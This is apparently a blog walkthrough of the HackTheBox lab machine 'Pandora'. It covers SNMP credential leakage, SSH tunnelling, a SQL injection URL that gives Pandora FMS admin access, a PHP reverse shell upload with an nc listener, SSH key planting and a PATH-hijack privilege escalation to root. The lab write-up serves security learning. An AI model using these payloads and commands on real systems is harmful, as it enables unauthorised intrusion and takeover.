Pandora from HackTheBox — Detailed Walkthrough
Showing you all the tools and techniques needed to complete the box.
Machine Information
Pandora is an easy machine on HackTheBox. An initial website on port 80 reveals nothing, but enumeration of UDP ports exposes credentials for SSH. We find a binary that points us to a website running locally on the box, which we access via port tunnelling. We gain admin access to Pandora FMS on the box via an exploit. From there we upload a reverse shell to gain access as a low level user. Enumeration finds another binary, this one uses an unquoted path to tar which it uses to back up the pandora site. We use this to get a root shell to complete the box.
Skills required are basic web and OS enumeration. Skills learned are using public exploits, and tunnelling traffic to access remote sites.
Initial Recon
As always let’s start with Nmap:
Just a website on port 80 to look at to start with:
Looking around we find it’s a simple html site with nothing of interest. Next I did a quick scan of UDP ports:
┌──(root💀kali)-[~/htb/pandora]
└─# nmap -sU --top-ports=20 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 21:32 GMT
Nmap scan report for 10.10.11.136
Host is up (0.025s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp closed dhcpc
69/udp closed tftp
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp closed isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp open|filtered upnp
4500/udp closed nat-t-ike
49152/udp open|filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 8.40 secondsSNMP
Port 161 which is SNMP is open, let’s have a closer look at that:
┌──(root💀kali)-[~]
└─# nmap -sC -sV -sU -p161 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 21:26 GMT
Nmap scan report for 10.10.11.136
Host is up (0.021s latency).
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-win32-software:
| accountsservice_0.6.55-0ubuntu12~20.04.5_amd64; 2021-12-07T12:57:21
| adduser_3.118ubuntu2_all; 2021-02-01T17:21:32
| alsa-topology-conf_1.2.2-1_all; 2021-02-01T17:25:18
| alsa-ucm-conf_1.2.2-1ubuntu0.11_all; 2021-12-07T12:57:25
| amd64-microcode_3.20191218.1ubuntu1_amd64; 2021-06-11T12:44:07
| apache2-bin_2.4.41-4ubuntu3.8_amd64; 2021-12-07T12:57:07
| apache2-data_2.4.41-4ubuntu3.8_all; 2021-12-07T12:57:07
| apache2-utils_2.4.41-4ubuntu3.8_amd64; 2021-12-07T12:57:07
<SNIP>
| 837:
| Name: cron
| Path: /usr/sbin/CRON
| Params: -f
| 838:
| Name: sh
| Path: /bin/sh
| Params: -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p <HIDDEN>'
<SNIP>There was a long list returned but we see something interesting, a username and password have been leaked.
SSH Access As Daniel
Trying these credentials on the SSH port we saw open works:
┌──(root💀kali)-[~]
└─# ssh daniel@10.10.11.136
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
System information as of Wed 19 Jan 21:34:26 UTC 2022
daniel@pandora:~$We’re in and a quick look at the passwd file shows there’s another user called matt:
The user flag is owned by Matt so we can’t get that yet:
daniel@pandora:~$ ls -ls /home/matt/
4 -rw-r----- 1 root matt 33 Jan 19 17:08 user.txtLooking at running processes shows the same long list we saw before:
Suspicious Binary
The file host_check is being run with those credentials we used to get in, let’s have a look at that:
daniel@pandora:~$ cat /usr/bin/host_check
ELF>�@:@8
H�=��(�����ÐAWL�=�+AVI��AUI��ATA��UH�-�+SL)�H������H��t�L��L��D��A��H��H9�u�H�[]A\A]A^A_��H�H��
PandoraFMS host check utilityNow attempting to check PandoraFMS registered hosts.Files will be saved to ~/.host_check/usr/bin/curl
'http://127.0.0.1/pandora_console/include/api.php?op=get&op2=all_agents&return_type=csv&other_mode=url_encode_separator_%7C&user=daniel&pass='
> ~/.host_check 2>/dev/nullHost check unsuccessful!
Please check your credentials.
Terminating program!Host check successful!
Terminating program!Ussage: ./host_check -u username -p password.Two arguments expected.����X����h���XM���������X���0zRxIt’s a binary file so the output from cat is messed up but we can see curl in there with a URL. We can try that on the box:
Port Forwarding
Ok, I have no idea what it’s doing! However there is something running on the loopback IP with what looks like a subfolder called pandora_console. We can use port forwarding like we have many times in the past, most recently on Static:
┌──(root💀kali)-[~]
└─# ssh -L 8000:127.0.0.1:80 daniel@10.10.11.136
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
System information as of Wed 19 Jan 21:52:09 UTC 2022
Last login: Wed Jan 19 21:34:27 2022 from 10.10.14.10
daniel@pandora:~$Above is logging in to an SSH session on the box using the credentials for Daniel, but this time we’re forwarding any traffic to our Kali port 8000 through the SSH tunnel to the box on port 80. Doing this we can use a web browser on Kali to access that website we’ve found on the box via SSH:
Pandora Console
Now we can access that console and we see something called Pandora FMS. Clicking on the docs link top left takes us here. Also at the bottom of this landing page we see the version on the box is revealed as v7.0NG.742_FIX_PERL2020.
After a quick search I found this blog that shows a vulnerability in that version on Pandora. Looking up the CVE in there we find this GitHub repo with a proof of concept to try.
It’s simple enough, we just paste this in to our browser on Kali whilst we have our tunnel forwarding to the box:
http://127.0.0.1:8000/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario%7Cs:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271
In a new tab open the pandora_console again and now we have access as admin:
There’s a lot to look around but eventually I found this File Manager section:
Which takes me to a list of files. Clicking the top right icon brings up this Upload Files box:
Reverse Shell
Time for a reverse shell. Let’s use one of the PHP shells already included on Kali:
┌──(root💀kali)-[~/htb/pandora]
└─# cp /usr/share/laudanum/php/php-reverse-shell.php .
┌──(root💀kali)-[~/htb/pandora]
└─# cat php-reverse-shell.php | grep '$ip'
$ip = '10.10.14.10'; // CHANGE THISAll I’ve done is changed the IP to my current tun0. Switch back to the webpage and upload the file:
That works and scrolling down the long list of files we can find ours:
Hovering over the files we can see a path in the URLs:
http://127.0.0.1:8000/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager&directory=images/backgrounds&hash2=764b0acce6acdb3e5ca2a6ebb646ec29In there you can see it says directory=images. This is the path to the file we’ve uploaded, start a nc listening in another terminal on Kali then browse to the shell we uploaded:
Back to the terminal to see we’re connected:
┌──(root💀kali)-[~/htb/pandora]
└─# nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.136] 55864
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
$First thing lets upgrade our shell:
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
matt@pandora:/$ ^Z
zsh: suspended nc -nlvp 8888
┌──(root💀kali)-[~/htb/pandora]
└─# stty raw -echo; fg
[1] + continued nc -nlvp 8888
matt@pandora:/$ export TERM=xterm
matt@pandora:/$ stty rows 51 cols 236User Flag
That’s better. Now we can see we’re in as Matt, let’s grab the user flag:
matt@pandora:/$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
matt@pandora:/$ cat /home/matt/user.txt
6de8401da164b118c4bbad8549bde0d1Pandora Backup
A look around found an interesting file:
matt@pandora:/$ find / -perm -4000 2>/dev/null
<SNIP>
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
<SNIP>What is pandora_backup?
matt@pandora:/$ ls -lsa /usr/bin/pandora_backup
20 -rwsr-x--- 1 root matt 16816 Dec 3 15:58 /usr/bin/pandora_backupNot sure, let’s see what it does:
matt@pandora:/$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!It doesn’t seem to work. Looking inside it with cat reveals it’s another binary, and we can see it’s using tar to backup the pandora installation to a folder in root:
matt@pandora:/$ cat /usr/bin/pandora_backup
ELF>�@0:@8
@@@@h���HHmm HH�-�=�=hp�-�=�=����DDP�td� � � <<Q�tdR�td�-�=�=▒▒/lib64/ld-linux-x86-64.so.2GNUqtðG7�%H9�
<SNIP>
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*Backup failed!
Check your permissions!Backup successful!Terminating program!<(�������������X}�������h���8zRxSSH Access As Matt
After a fruitless play around I eventually decided to drop out of this reverse shell and use a proper SSH session. First create a new key pair on Kali:
┌──(root💀kali)-[~/htb/pandora]
└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/htb/pandora/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/htb/pandora/id_rsa
Your public key has been saved in /root/htb/pandora/id_rsa.pub
The key fingerprint is:
SHA256:sJrMlhq6+lBuOaxgeVcKujv75rGInYGSf1A2GHa2fXY root@kali
The key's randomart image is:
+---[RSA 3072]----+
| |
| o o |
| . = o. |
| . = .oo E |
| .+ ..+S. |
| *++.+o |
|*+O+Bo |
|=O+O= |
|BB&= |
+----[SHA256]-----+Don’t forget to change permissions:
┌──(root💀kali)-[~/htb/pandora]
└─# chmod 600 id_rsaCopy the public key to the clipboard:
┌──(root💀kali)-[~/htb/pandora]
└─# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDoUK0S9FLwAzcvY5zWa70acZ/CWevVuxj3zIfjhFjZnklGvsCpFxTK124kVy8htLciaaP25f+14g2cD65Ao5DOJQclwI7h8oEXk879NvwDhBnqTt6S+OXn44XPIFvt9cdpaaxDDMZkRrh0mHtC9XVnTk0d/Sq61afh5/k9MozSJpvX55et2p/+Hj7Mk77q/zK2/Nt4MFtNogwlVd9ArQgOiyljKpG1Byjb/IYOssbdhgV1rgqoSVInXgWUeoXZmSpkmzK/W5wQ6sCkRBBmnHe8aLsZr++5YDZM9M8yuO1HxMK0KhSl5xrjvwBp7f8+PLt9DR+vmgiHxz5JUIPu1lOFrBxjozM5oXA4WBvmDFzJH+B4Ti0PJNA2qMCXO8SNFk06+tkkxHZ4tBRhpTpaESKafeFzlIamGIA9xKlL9bxfPhHKwAHVEo8Emopj4foaf8ho3Cy7u5/69s0p1DWZ1bAED367C0QbF5GmvsI/9Zny03badPLt17O558foH9+RfOE= root@kaliBack on the box make the .ssh folder in Matts home directory:
matt@pandora:/home/matt$ mkdir .sshNow paste that public key from Kali on to the box and save to authorized_keys:
matt@pandora:/home/matt$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDoUK0S9FLwAzcvY5zWa70acZ/CWevVuxj3zIfjhFjZnklGvsCpFxTK124kVy8htLciaaP25f+14g2cD65Ao5DOJQclwI7h8oEXk879NvwDhBnqTt6S+OXn44XPIFvt9cdpaaxDDMZkRrh0mHtC9XVnTk0d/Sq61afh5/k9MozSJpvX55et2p/+Hj7Mk77q/zK2/Nt4MFtNogwlVd9ArQgOiyljKpG1Byjb/IYOssbdhgV1rgqoSVInXgWUeoXZmSpkmzK/W5wQ6sCkRBBmnHe8aLsZr++5YDZM9M8yuO1HxMK0KhSl5xrjvwBp7f8+PLt9DR+vmgiHxz5JUIPu1lOFrBxjozM5oXA4WBvmDFzJH+B4Ti0PJNA2qMCXO8SNFk06+tkkxHZ4tBRhpTpaESKafeFzlIamGIA9xKlL9bxfPhHKwAHVEo8Emopj4foaf8ho3Cy7u5/69s0p1DWZ1bAED367C0QbF5GmvsI/9Zny03badPLt17O558foH9+RfOE= root@kali" > .ssh/authorized_keysDon’t forget to change permissions:
matt@pandora:/home/matt$ chmod -R 600 .ssh/Now we can log in via SSH as Matt using our keys:
┌──(root💀kali)-[~/htb/pandora]
└─# ssh -i id_rsa matt@10.10.11.136
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
ystem information as of Wed 19 Jan 22:51:24 UTC 2022
matt@pandora:~$This time when we run the backup it works:
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: Removing leading `/' from member names
/var/www/pandora/pandora_console/AUTHORS
tar: Removing leading `/' from hard link targets
/var/www/pandora/pandora_console/COPYING
/var/www/pandora/pandora_console/DB_Dockerfile
/var/www/pandora/pandora_console/DEBIAN/
/var/www/pandora/pandora_console/DEBIAN/md5sums
/var/www/pandora/pandora_console/DEBIAN/conffiles
/var/www/pandora/pandora_console/DEBIAN/control
<SNIP>
/var/www/pandora/pandora_console/vendor/egulias/email-validator/EmailValidator/Validation/MultipleErrors.php
/var/www/pandora/pandora_console/vendor/egulias/email-validator/EmailValidator/Validation/EmailValidation.php
/var/www/pandora/pandora_console/vendor/egulias/email-validator/EmailValidator/Validation/DNSCheckValidation.php
/var/www/pandora/pandora_console/vendor/egulias/email-validator/EmailValidator/EmailParser.php
/var/www/pandora/pandora_console/vendor/egulias/email-validator/EmailValidator/EmailValidator.php
/var/www/pandora/pandora_console/vendor/egulias/email-validator/README.md
/var/www/pandora/pandora_console/vendor/egulias/email-validator/composer.json
/var/www/pandora/pandora_console/vendor/egulias/email-validator/phpunit.xml.dist
/var/www/pandora/pandora_console/vendor/egulias/email-validator/LICENSE
/var/www/pandora/pandora_console/ws.php
Backup successful!
Terminating program!Privilege Escalation
Now we can take advantage of that unquoted path to tar that we saw when looking in the backup program.
Just create our own file called tar which calls bash and make it executable:
matt@pandora:~$ echo '/bin/bash;' > tar
matt@pandora:~$ chmod +x tarAdd this folder to $PATH at the start so our version of tar is used instead of the correct one:
matt@pandora:~$ export PATH=/home/matt:$PATH
matt@pandora:~$ $PATH
-bash: /home/matt:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin: No such file or directoryWith /home/matt at the start of the path the backup program will use tar in there instead. Run the backup again:
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:~#Root Flag
It stops before doing anything and we are at a root prompt. Let’s grab the flag:
root@pandora:~# id
uid=0(root) gid=1000(matt) groups=1000(matt)
root@pandora:~# cat /root/root.txt
4bfc0ffaf379e65d41adb3f0f3b9144aAll done. Hope you enjoyed this box, see you next time.
If you liked this article please leave me a clap or two (it’s free!)
Twitter — https://twitter.com/pencer_io
Website — https://pencer.io
Originally published at https://pencer.io on May 24, 2022.
